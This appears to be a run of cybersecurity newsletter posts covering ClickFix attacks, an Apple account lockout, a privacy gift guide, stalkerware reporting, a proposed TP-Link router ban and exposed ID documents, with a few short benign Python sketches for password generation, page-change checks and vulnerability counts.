This is particularly problematic because anyone can get redirected to a ClickFix attack from almost anywhere online, including phishing emails, dodgy search results, and otherwise regular websites whose owners might not know they have been hacked to host malicious ClickFix attack code.

In this article, we'll dive into what you need to know about how ClickFix attacks work, why they're so dangerous for ordinary users, why companies and enterprises also need to be aware of them, and what you can do to avoid these hacks and stay safer online.

I have also tested a few of these ClickFix attacks in the wild, so jump in with me and I'll show you, with screenshots and animations, what you should look out for. I really think this article is worth your time, and your subscription!

Paris Buttfield-Addison with an absolute horror story:

A major brick-and-mortar store sold an Apple Gift Card that Apple seemingly took offence to, and locked out my entire Apple ID, effectively bricking my devices and my iCloud Account, Apple Developer ID, and everything associated with it, and I have no recourse.

The full blog post is chilling. Buttfield-Addison only got his Apple account reinstated after blogging about his experience, and other high-profile blogs re-shared his ordeal, which caught the attention of an actual human in Apple's executive relations team who restored his account a week later.

Buttfield-Addison is the latest public example of a company revoking access to a person's digital life, probably due to some automated decision, but where affected customers have no means or grounds to appeal. In reality, this happens all the time and most people's stories never see the light of day. Even companies like Apple, which sell physical electronics for a living, hold too much power and control over their customers' digital lives in perpetuity, and customers generally don't have the means to fight back or hold the companies accountable when things go wrong.

It's also a warning to everyone (not just Apple customers, and especially at this time of year) that gift cards are prone to scams that are increasingly difficult to detect. If one bad gift card can result in nuking access to someone's account, then gift cards aren't worth the risk to begin with.

More at Tidbits.

I'll start by saying that I'm generally not a fan of gift guides. If you've ever spent hours on the web struggling to find anything of value in a vast ocean of "best of" lists only to come up with nothing, you're not alone.

This year, I wanted to suggest some gift ideas that can help your friends and family stay better protected online, more equipped to take on a home project or two, or learn something new altogether.

Or, if the bar for you is simply looking for "security and privacy gifts that aren't complete shit," then at least you're in the right place.

Cybersecurity is also something that's deeply personal to some people. Nobody wants a gift (or to give a gift) that could inadvertently create a security or privacy risk. That's why these gift suggestions span a range of ideas and skillsets, and are designed to be useful but optional.

Do I make a commission on any of these? Nope! Do I get kickbacks for anything listed? Hell no! Every one of these suggestions is from my heart, no strings attached. Take it or leave it; I'm trying to save you some time.

But if you do like what you see here and find it helpful, please consider a paying subscription to ~this week in security~ for mid-week analysis, blogs, and much more exclusive content from me, your trusted source in cyber, because it helps me do even more thoughtful writing and reporting on the topics that are most interesting to you.

Gift a subscription to your favorite news source

Independent journalists have broken some of the most important news stories of the year, and absolutely deserve your subscription dollars. There are countless independent outlets driving the cybersecurity conversation (and beyond!), and you can give a subscription as a gift to a friend, or take one for yourself.

Just to name a few, the folks at 404 Media have done incredible reporting this year covering ICE's deportation machine, Flock surveillance, and airlines ceasing to share your flight records with the government. Plus, it's a great all-round read, and they make it easy to grab a gift subscription for $100. 404 Media also has merch you can buy, if you want something beyond the blogs as well.

There's also the incredible Kim Zetter, who blogs at Zero Day on the regular with cybersecurity and national security analysis, blogs, and more.

Lawdork, a legal blog by Chris Geidner, is a must-read resource for all the major legal and courtroom news of the day, of which there's a lot these days. Geidner blogs daily about how the news affects you, and the rights of wider America. And, Court Watch by Seamus Hughes is another fantastic legal blog that frequently covers news relating to cybersecurity and national security.

I'm also a fan of The Handbasket by Marisa Kabas, who does incredible reporting on a broad range of topics that affect everyone, from politics to the erosion of democracy, and does a brilliant job of holding powers to account where few others are. Kabas also has a separate post on gifting journalism from independent media outlets with more ideas.

Tools that scrub the web of your public information

Have you tried Googling yourself recently? Data brokers are constantly finding new ways to scrape your personal information, from your addresses to your phone numbers, and make it available to anyone who wants to pay for it. There's also an ever-growing industry of online deletion services that automatically send removal requests to data collectors on your behalf to remove your personal information from their websites, and to opt-out of data collection in the future.

Consumer Reports tested a bunch of these data removal services in 2024 and found some perform better than others (even if doing it yourself is ultimately the most effective of all). I personally like using DeleteMe; it's a pretty decent service that you can set up and then largely forget, until it notifies you periodically of all the sites it's opting you out of. DeleteMe also allows you to sign up a family member on your own account (ideal for a surprise gift!), and lets you use virtual credit card numbers so you can pay for things online without giving over your actual card number to a potentially dodgy website. Just be mindful that some services, like Optery, now rely on AI, which might not be for everyone.

A Flipper Zero hacking tool can keep curious minds entertained

Flipper Zero devices are multi-functional hacking tools akin to a digital Swiss army knife, allowing their operators to tinker, experiment, and occasionally cause light mayhem with nearby wireless technologies like Wi-Fi, Bluetooth, NFC, and infrared, while fusing the chill vibes of a modern-day Tamagotchi.

I've had a Flipper Zero for a few years and, shy of any actual need for one, it's just fun to experiment with, such as reading and cloning RFID keycards, covertly remotely switching off boring television channels in busy bars, and running custom scripts over Bluetooth.

There's so much you can do with these things, including browsing the Flipper Zero's own app store and loading your own open-source code, that it can keep anyone with a cyber-curious mind busy for hours on end. Flipper Zeros land at $199 for the base model.

Gift someone regular shipments of their favorite coffee

I'd be lost without my morning coffee, or my mid-morning coffee… or my late afternoon coffee. To gift someone a regular delivery of their favorite grind, Mistobox provides a sliding-scale subscription that makes it easy for recipients to sign up with their favorite types of coffee and receive a variety of fresh shipments from small business roasters and coffee shops all over the United States. I'm a big fan of their dark roast selections, and thoroughly enjoyed getting (in my case) a new monthly shipment sent to my house.

A subscription to a decent password manager

For the cybersecurity novice, consider a gift subscription to a password manager, which allows you to store your passwords, credit card numbers, and other digital keys in one place and securely take them with you. Password managers help to encourage strong online security by generating strong and unique passwords as you browse the web, rather than having you rely on a single password that you've remembered for years that you use to log into every site. There's one major problem with that: If one site gets hacked, that same password is busted everywhere else.
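As a rough illustration of what "strong and unique" means in practice, here is a minimal Python sketch that gives every site its own random password. It is not how 1Password, Bitwarden, or any other password manager actually works; the function names, the 20-character default, and the example sites are all assumptions made for the example.

```python
import secrets
import string

# Letters, digits, and punctuation: an assumed character set for this sketch.
ALPHABET = string.ascii_letters + string.digits + string.punctuation


def generate_password(length: int = 20) -> str:
    """Return a random password drawn from a cryptographically secure source."""
    if length < 12:
        raise ValueError("use at least 12 characters")
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def passwords_for_sites(sites: list[str]) -> dict[str, str]:
    """Give every site its own password, so one breach doesn't expose the rest."""
    return {site: generate_password() for site in sites}


if __name__ == "__main__":
    # Placeholder site names; a real password manager also encrypts and syncs.
    vault = passwords_for_sites(["example.com", "example.org"])
    for site, password in vault.items():
        print(site, password)
```

The important part is the second function: because each site gets a different password, a breach at one site reveals nothing about your login anywhere else.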

Not all password managers are created equal, but the most convenient ones let you take your passwords with you as a phone app. 1Password is a great password manager (and provides gift cards!), and Bitwarden is also a popular favorite and also offers gifting options. Subscriptions start at a few dollars a year, and go up from there.

Both 1Password and Bitwarden also support passkeys, a newer and far more secure way to log in to websites and online services. As such, you probably won't have much need for a hardware security key, such as a YubiKey, unless you want a login option that is physically separated from the internet.

Go exploring for exposed tech with a Shodan membership

Shodan is a search engine for exposed internet devices and databases, from digital video recorders and unprotected webcams to occasionally military emails. Using Shodan is an easy way to get into bug bounty hunting, data breach dumpster diving, and more. I've used Shodan for years as part of identifying and tracking down data breaches, so it's a helpful tool to have in your back pocket. Also, you never know what you'll find on Shodan Safari, which refers to some of the most interesting (and worst!) things that people have put on the internet, from watching a single weed plant to monitoring an entire dairy farm.

You can sign up for a one-time $49 fee for membership, with no subscription required. There's no easy way to gift, but you could create an account, buy the membership, then hand off the username and password to the gift recipient. The gift recipient should be able to change their email address to something else. (You'll also get a notification about this when it's complete.)

Build your first homelab with a network attached storage (NAS) drive

If you want to splurge a little on someone who you know loves to tinker, I absolutely have to recommend buying a network attached storage (NAS) drive, such as those sold by Synology and Western Digital.

A NAS box is more than just an internet-connected hard drive that lives somewhere in your house to store your computer backups. A NAS is also a way to host your own applications and data, and build your very first homelab. I host a bunch of things at home, such as an RSS feed reader to catch up on all of my favorite news sources (FreshRSS); an ad-blocker for my entire network; a self-hosted streaming platform for watching my own TV and movies (Plex); a website page monitor to keep track of web pages that change over time, such as a price dip on a shopping page (ChangeDetection); and more.
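If you're curious how a page monitor can tell that something changed, the basic idea fits in a few lines of Python: keep a fingerprint of the page text from the last visit and compare it with a fresh one. This is only a sketch of the concept, not how ChangeDetection is implemented, and the `fingerprint` and `has_changed` names are made up for the example.

```python
import hashlib


def fingerprint(page_text: str) -> str:
    """Hash the page text, ignoring differences in whitespace."""
    normalized = " ".join(page_text.split())
    return hashlib.sha256(normalized.encode("utf-8")).hexdigest()


def has_changed(previous_fingerprint: str, page_text: str) -> bool:
    """True if the page no longer matches the fingerprint saved last time."""
    return fingerprint(page_text) != previous_fingerprint


if __name__ == "__main__":
    # Stand-in strings; a real monitor would download the page on a schedule.
    saved = fingerprint("Price: $49")
    print(has_changed(saved, "Price:   $49\n"))  # same text, different spacing
    print(has_changed(saved, "Price: $39"))      # the price dipped
```

Storing only a hash keeps the saved state tiny, at the cost of not being able to show what changed. A fuller monitor would keep the old text as well, so it can show you the difference.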

NAS devices are meant to be easy for anyone to use. But don't be surprised if you end up getting hooked on clawing back your data from the clutches of Big Tech. For me, it's really been a lot of fun to learn new things along the way.

Counter-surveillance clothing can protect you from prying eyes

Facial recognition and camera surveillance are on the rise, but so are efforts to evade intrusive tracking and unwanted photo-taking.

Just to name a couple: The folks at Urban Privacy have a whole selection of clothing that's designed to confuse facial recognition systems and protect against unsolicited photos. There's also Capable.Design, the fashion outlet that Petapixel wrote about in 2023, which makes clothing that tries to trick and deceive AI-enabled surveillance cameras by confusing their detection capabilities.

The glasses maker Zenni also has new lenses that can make it more difficult for some facial recognition systems to track wearers, though as 404 Media found, your mileage may vary.

When everything online fails, these cyber books and comics won't let you down

And lastly, you can't go wrong with a good book — and there are plenty to go around for anyone's cyber interests.

I co-authored our book club reading list on TechCrunch with a few suggestions that cover a range of topics, from espionage to cybercrime, the history of hacking and historical hacks, and beyond. Our post has all of the classics you'd expect, from Kim Zetter's incredible book Countdown to Zero-Day to Joe Menn's revised edition profiling Cult of the Dead Cow, and the breathtakingly good read Dark Wire by Joseph Cox to name a handful.

Plus, BBC cyber reporter Joe Tidy has published his debut book, CTRL+ALT+CHAOS, exploring how teenage hackers have run riot across the web and become a formidable cybercrime threat. And, author and journalist Geoff White also has a few books worth checking out as well, including one of the definitive books on North Korean crypto-stealing hacks and more.

And, if you want a perfect gift for someone who enjoys graphic novels and comics, there is a whole selection to choose from at Green Archer Comics by the amazing Allan Liska.

What tech not to buy!

There are a few notable mentions of technology that you should probably try to steer clear of, given some of the associated privacy and security risks. To wit:

- Surveillance tech like Ring doorbell cameras constantly stream video footage from your front door, which can include passers-by and your neighbors. Now these cameras are using facial recognition, adding a whole new dimension of creepy. Police and other authorities can request these videos without your consent, footage that can then be used against your neighbors.

- Smart speakers with an internet connection, like Amazon Echo and Google Nest devices, have microphones that not everyone would want in their home. Plus, smart speakers and voice assistants have been prone to audio activation lapses and other eavesdropping-related privacy issues.

- Family monitoring software is often on sale and highly advertised year-round, but is also susceptible to security lapses and exposing people's private location data. Avoid location monitoring, family tracking, or any kind of snooping software.

- Wearable tech is a controversial one as it can be used to monitor your own health, for example, and in other cases wearable tech can be used to monitor other people. Don't be one of those wankers who wear gross Meta Ray-Ban camera glasses. And if you're thinking about gifting an Oura ring to someone, remember that the company can access its customers' health data, and governments can come along and demand access to that data as well. Yeah.

- Virtual private network providers or VPNs are often touted as a security and privacy tool that can keep you safe and anonymous online. But commercial VPNs don't offer any more security and privacy for most people than not using one, notes Hacklore. VPNs are also really controversial because they just funnel all of your internet traffic to that VPN provider, which can see which websites you visit and sell that data to third parties. Even the "trusted" companies aren't actually that trustworthy. The best VPN is one that you set up and control yourself!

Thank you so much for reading ~this week in security~! Please reach out with any feedback, questions, or comments about this article (or even your own gift suggestions!) to [email protected].

If there's one thing from my nearly two decades in journalism I still think about with an everlasting hatred that burns with the heat of a thousand suns, it's "stalkerware."

We've seen countless headline-grabbing phone hacks using powerful government-grade spyware like NSO Group's Pegasus and Intellexa's Predator, which allow police and law enforcement to hack into the most up-to-date iPhones and Androids and snoop on the person's data within.

But stalkerware is a far more pervasive and underreported kind of surveillance that exists among civil society today, and it's used widely on people's phones without their consent. So, when a documentary crew from my native U.K. reached out to me earlier this year after reading some of my work investigating this creepy surveillance industry, I jumped at the chance to chat with them.

Stalkerware is a consumer-grade surveillance technology that gives anyone with a credit card the ability to track the phones of people closest to them with the snooping capabilities once reserved for spy agencies. We call it "stalkerware" because it's often used in spousal or family relationships by someone with physical access to a person's Android phone (or their phone's iCloud account). Stalkerware is designed to stay hidden on a person's phone, all the while uploading the victim's photos, messages, passwords, and real-time location data to the stalkerware's servers, and making that data available to the abuser.

As you can imagine, stalkerware is incredibly invasive. It can track what you do, where you go, and who you chat and meet with. Unsurprisingly, using stalkerware against someone without their permission is extremely illegal.

And yet, millions of people around the world use stalkerware every single day to spy on someone else's most private phone data.

I know this because stalkerware has a tendency to have absolutely crap security, and at least 26 operations since 2017 have been hacked or breached, or have otherwise exposed the vast amounts of data that they steal from people's phones. I also know this because over the years many of these breached stalkerware datasets have landed on my desk, sometimes by way of an anonymous source dropping a cache of files, and sometimes from a hacktivist who clearly wanted to leave their mark.

I began investigating stalkerware in early 2020 after a security researcher alerted me to a security flaw in a stalkerware operation that was spilling victims' stolen phone data to the public web. As a cybersecurity reporter, I've seen my fair share of alarming cyberattacks and breaches, but seldom had I seen a data leak as sensitive as this one. Seeing the highly personal contents of people's phones just sitting out there on an open web server hit a nerve that would ultimately send me on a multi-year journey to understand how these stalkerware operations worked, how they made money, and to identify the people profiting from them.

At TechCrunch, I have reported on over a dozen stalkerware and other adjacent spyware operations, with the aim of documenting their abuses and exposing the bad actors who run them. I've exposed the real-world identities of shadowy operators through their opsec mistakes; revealed how they use fake U.S. passports to skirt global anti-money laundering rules to make millions of dollars from selling spyware; and — through their own shoddy coding, security lapses, and data breaches — I have documented the global scale of some of these operations and their customers, from serving military personnel to sitting appeals court judges.

As such, this work has given me a rare insight into this entire industry, including datasets and financial records from these operations, allowing careful analysis to understand in which regions the most victims are located and where enforcement of the laws is falling short, and to raise broader reader awareness of the issues.

Stalkerware permeates every corner of society, all across the world. And, as the documentary makers I chatted with found out and reported in their film, stalkerware is increasingly used in abusive relationships by under-30s to track and monitor their partners. The documentary for the U.K.'s Channel 4, "Controlled: Can I Trust My Partner?" (also on YouTube), deftly explores the ethical, safety, and legal considerations of stalkerware and its many dangers.

I'm thrilled to have participated and to have been featured in the documentary. If you're in the U.K. (or able to be digitally) then check it out; it's worth your time.

The documentary also gave me an opportunity to reflect on my investigations and reporting over the past five years, and on what I've learned. In this article for subscribers, I dive into why stalkerware continues to be a major worldwide threat, how stalkerware operations are able to operate in plain sight, and why countering this kind of surveillance technology is an uphill battle, but also why the tide may actually be turning against the stalkerware industry. 👀

Many, many more words for subscribers after the fold… but first:

If you or someone you know needs help, the National Domestic Violence Hotline (1-800-799-7233) provides 24/7 free, confidential support to victims of domestic abuse and violence. If you are in an emergency situation, call 911. The Coalition Against Stalkerware has resources if you think your phone has been compromised by spyware.

If you think your device has stalkerware, I have a how-to guide at TechCrunch that can guide you through what to look for and how to remove it — if it's safe.

Excellent reporting by Joseph Menn at The Washington Post ($):

More than a half-dozen federal departments and agencies backed a proposal to ban future sales of the most popular home routers in the United States on the grounds that the vendor’s ties to mainland China make them a national security risk, according to people briefed on the matter and a communication reviewed by The Washington Post.

Commerce officials concluded TP-Link Systems products pose a risk because the U.S.-based company’s products handle sensitive American data and because the officials believe it remains subject to jurisdiction or influence by the Chinese government. TP-Link Systems denies that, saying that it fully split from the Chinese TP-Link Technologies over the past three years.

…If imposed, the ban would be among the largest in consumer history and a possible sign that the East-West divide over tech independence is still deepening amid reports of accelerated Chinese government-supported hacking.

The short version is that the U.S. government wants to ban TP-Link routers because several U.S. federal agencies believe — rightly or wrongly — that there are sufficient links tying TP-Link to China, and that could theoretically allow the Chinese government to force TP-Link to act in some nefarious capacity against U.S. national interests. The subtext is that this ostensible Chinese government control could force TP-Link to roll out malicious updates, or suddenly block its products from working en masse, such as at a time that would be advantageous to China.

For its part, TP-Link vehemently denies any links to China following the split from its Chinese parent company. TP-Link is fully headquartered in California, and its routers are manufactured in a TP-Link-owned facility in Vietnam, neither of which — for the geography enthusiasts out there — are China.

An important caveat, of course, is that much of this proposed ban remains up in the air and without any final decision — at least as of the time of this publication. The Post notes that the ban may not go ahead under the Trump administration, or a settlement could be reached with TP-Link preventing a ban.

The Wall Street Journal ($) covered the story as far back as December 2024. Wired ($) has also detailed TP-Link's since-divested Chinese roots, as has independent journalist Brian Krebs in a recent blog post, which you should read. All to say, there have been rumblings for some time that this ban may be in the works.

With absolutely no skin in the game (I'm not a TP-Link customer, and I kinda hate how the internet has turned out at large), I don't think banning TP-Link over its alleged ties to China will make the U.S. any meaningfully safer or better defended from cyberthreats. China, or any other advanced malicious actor in cyberspace, doesn't need to control a router manufacturer in order to spy on people's communications or prepare for causing widespread societal disruption. It's already possible to hack and take control of enormous clusters of internet-connected devices effectively, thanks to years of security rot that has opened the U.S. to the very cybersecurity threats that it's trying to avoid. And there's no hard evidence to suggest TP-Link makes products that are any more susceptible to security flaws than those made by the wider industry.

Routers are our gateways to the internet, whether it's your home Wi-Fi router box or the racks of networking gear at your office. But these devices have always been a hotbed of security flaws. Router security is an industry-wide problem, a by-product of selling a one-time piece of hardware that its manufacturer has to keep supported with software updates for several years down the line. Consumers don't buy routers very regularly, and the companies selling routers haven't tended to make much money from them.

This means many routers on the internet today are easy targets, and not always because the hackers are targeting a specific victim. In reality, routers can also get ensnared by automated attacks that rely on mass-exploiting the same vulnerability across the entire internet. These attacks often abuse really simple security flaws, such as default passwords that have never been changed, which let the hackers log in to your router as if they were you. From there, hackers make configuration changes that make it easier to take control of your router and the network traffic that flows through it, and this can happen silently and without your knowledge.

By taking control of a large number of hijacked routers, hackers can launch distributed denial-of-service (DDoS) attacks, which harness the collective internet traffic of thousands of hacked routers (known as a botnet) to pummel websites with huge amounts of junk internet traffic, knocking them offline. In other cases, hacked routers can be used passively as part of residential proxy networks, in which hackers and their malware funnel their malicious internet traffic through residential home routers so that the data looks less suspicious coming from an ordinary home address than, say, the Ministry of State Security in China.

There have been a lot of router security flaws over the years, some worse than others, leading to massive botnets capable of launching large-scale disruptive cyberattacks. CISA's catalog of security vulnerabilities known to have been actively exploited in hacking campaigns, which it has maintained since 2021, shows that, to date, TP-Link had at least six actively exploited bugs, while router-making rivals Juniper had at least eight, SonicWall had 14, D-Link had 24, and Cisco had at least 80. There are no angels here.
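
For readers who want to reproduce a tally like this, here is a minimal Python sketch. It assumes the catalog has been downloaded as JSON and that each entry sits in a top-level `vulnerabilities` list with a `vendorProject` field, which is how CISA's published feed has been structured; treat those field names as assumptions to verify against the file you download. The function name and the sample entries (including the CVE labels) are made-up placeholders, not real catalog data.

```python
from collections import Counter


def count_by_vendor(catalog, vendors):
    """Count catalog entries per vendor, matching names case-insensitively."""
    # Map lowercase names back to the spelling the caller asked for
    wanted = {v.lower(): v for v in vendors}
    # Start every requested vendor at zero so absent vendors still appear
    counts = Counter({v: 0 for v in vendors})
    for entry in catalog.get("vulnerabilities", []):
        name = entry.get("vendorProject", "").strip().lower()
        if name in wanted:
            counts[wanted[name]] += 1
    return counts


# Hypothetical sample standing in for the downloaded catalog
sample_catalog = {
    "vulnerabilities": [
        {"cveID": "CVE-0000-0001", "vendorProject": "TP-Link"},
        {"cveID": "CVE-0000-0002", "vendorProject": "Cisco"},
        {"cveID": "CVE-0000-0003", "vendorProject": "cisco"},
        {"cveID": "CVE-0000-0004", "vendorProject": "D-Link"},
        {"cveID": "CVE-0000-0005", "vendorProject": "Example Corp"},
    ]
}

tally = count_by_vendor(sample_catalog, ["TP-Link", "Cisco", "D-Link", "Juniper"])
for vendor, total in tally.most_common():
    print(f"{vendor}: {total}")
```

To run this against real data, replace `sample_catalog` with the result of `json.load()` on the downloaded catalog file. Exact vendor-name matching is a deliberate simplification; a vendor listed under more than one name would need extra handling.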

The best solution is to build routers with as much foundational security as possible, so that they can't be ensnared in cyberattacks, whether through government-sanctioned software updates or by way of a malicious botnet made up of thousands of hacked devices. These aren't novel concepts, from using open-source software and updates so that no backdoors can be slipped in without being noticed, all the way through to removing default passwords so that every device sold has a unique login mechanism. Long-term goals can include switching to memory-safe coding languages, which can eradicate an entire class of common security flaws that hackers have historically used to compromise routers.
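
As one illustration of the "no default passwords" idea, a manufacturer could generate a random, unique credential for each device at the factory rather than shipping one shared login. The following is a minimal Python sketch of that idea, not any vendor's actual provisioning process; the function names, serial numbers, and password length are all assumptions made for the example.

```python
import secrets
import string

# Letters and digits, minus characters that are easy to confuse on a printed label
ALPHABET = "".join(
    c for c in string.ascii_letters + string.digits if c not in "0O1lI"
)


def generate_device_password(length=16):
    """Return a random password drawn from a cryptographically secure source."""
    return "".join(secrets.choice(ALPHABET) for _ in range(length))


def provision(serials, length=16):
    """Assign each device serial number its own independently generated password."""
    return {serial: generate_device_password(length) for serial in serials}


# Hypothetical serial numbers for three devices coming off the line
credentials = provision(["SN-0001", "SN-0002", "SN-0003"])
for serial, password in credentials.items():
    print(serial, password)
```

The sketch uses Python's `secrets` module rather than `random` because the passwords need to be unpredictable, and each password is generated independently so that learning one device's login reveals nothing about another's.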

The good news is that, generally speaking, routers sold today are more secure than routers that have already been on the internet for half a decade or more, so the industry is making some progress.

Router security has also improved in recent years, thanks to legislation passed in California, as well as the United Kingdom and beyond, effectively banning the sale of internet-connected devices that ship with default passwords and enforcing other basic cybersecurity measures. Plus, there has been a concerted effort by cybersecurity folks urging companies to employ Secure by Design principles, which bake defensive cybersecurity measures into the product design cycle. Even the hardware manufacturers now realize that cybersecurity is a selling point for consumers these days, especially for critical technologies like internet-connected devices.

With that in mind, if you can't remember the last time you replaced (or updated) your router, then it's probably been too long — and now would be a good time to check.

Thank you so much for reading ~this week in security~! Please reach out with any feedback, questions, or comments about this article: [email protected].

On several occasions this year, my computer screen has filled up with literally tens of thousands of people's passports and driver's licenses. My job doesn't require me to handle or process these documents, and, before you ask, I'm not a hacker who's broken in somewhere to access them.

But thanks to shoddy cybersecurity and sloppy coding, oftentimes these sensitive government-issued documents are simply left exposed to the open web for anyone to find. Sometimes I find them, sometimes they find me.

Case in point: A cloud storage server containing some 223,000 government-issued IDs was secured this week after the data was left publicly exposed for an unknown amount of time, likely due to a misconfiguration caused by human error. This meant that reams of passport scans were publicly accessible to anyone on the internet who knew where to look — an easily guessable web address was all you needed, no passwords necessary.

Anurag Sen, an independent security researcher I've known for many years, reached out to me after finding the cloud server earlier this month packed with passports and driver's licenses from around the world. Sen's speciality is finding data online that shouldn't be there. Exposed data can include highly sensitive information, like U.S. military emails and online tracking data collected by powerful advertising giants, through to the personally identifiable data of regular people. Sen works tirelessly to get the data reported to its owner so it can be secured. On the rare occasion Sen can't figure out who the owner is or gets no response, he may reach out to me and we'll try to identify and contact the source of the spill together.

After several days of looking at this cache of exposed passports and driver's licenses, we were both stumped. We couldn't figure out who the customer was, and it wasn't even clear for what purpose the IDs were being stored to begin with. We were left with few options, except to contact the web hosting company storing the customer's data and hope for the best.

This is just the latest in a long list of incidents involving exposed government-issued IDs.

In January, I reported on a similar data breach containing the scans of more than 200,000 driver's licenses, selfies, and other identity documents belonging to customers of an online gift card store. Then, some months later in August, I found a really simple security flaw in the newly launched but popular app called TeaOnHer that allowed anyone to download the IDs of users who had to submit a copy before they could use the app. The bug was so easy to discover that I found it within just 10 minutes of learning of the app. I would be amazed if someone else hadn't found the bug first.

And that's not to forget other major spills that haven't been in my personal orbit. You may have heard of a few: Tea, the original app that preceded TeaOnHer, exposed thousands of its users' IDs, which were subsequently shared on the notorious forum 4chan soon after the app's launch. Discord had a data breach of a customer support system involving its trust and safety team, which handles requests and appeals related to age-verification. Car rental giant Hertz disclosed a breach of driver's license data earlier this year, as did crypto exchange giant Coinbase.

Clearly we have a problem.

Nowadays, we can be asked multiple times during our regular daily lives to hand over our IDs, or upload a copy to the internet for, well, reasons. From booking an appointment with your doctor online to picking up mail at your local post office, providing a copy of your passport or driver's license for some kind of service has become the new normal, and in some cases you can't easily opt out. "It's policy," they might say, and that's that.

It's also increasingly necessary to hand over your ID for an even broader set of reasons. Age verification laws around the U.S., parts of Europe, and beyond, require adults to upload a copy of their ID before they can be allowed to access a website or use certain website features, like direct messaging. Plus, there has been an increase in the number of closed communities, such as apps Tea and TeaOnHer, which rely on screening their users by digitally checking their government-issued IDs before allowing them in.

Yet, companies and app developers are not keeping the data they collect safe, and are contributing to the ever-expanding pool of exposed IDs on the internet.

The irony is that exposing so many driver's licenses and passports makes it easier for anyone to use those IDs for fraudulent purposes. That might be someone with the malicious intent to do a little cybercrime, or some hapless kid trying to trick an age verification system into allowing them to access an adult website.

The good news, if there is any, is that the server spilling 223,000 government-issued IDs to the web is now secured, thanks to Sen's data breach hunting skills. I contacted DigitalOcean to alert them that one of their customers was leaking data, and the data was secured soon after.

Without knowing who the customer is, that still leaves hundreds of thousands of people potentially unaware that their personal information was spilled, a responsibility that rests squarely with the customer who exposed the data to the web.

In the end, it really shouldn't be this easy to find driver's licenses and passports online.

Thank you so much for reading ~this week in security~! Please reach out with any feedback, questions, or comments about this article: [email protected].

Working in partnership, this week in security and DataBreaches.net wanted to hear from security researchers and journalists about their experiences facing or receiving legal demands and criminal threats as part of their work.

The survey is now closed and the results are in. Thanks so much to everyone who contributed!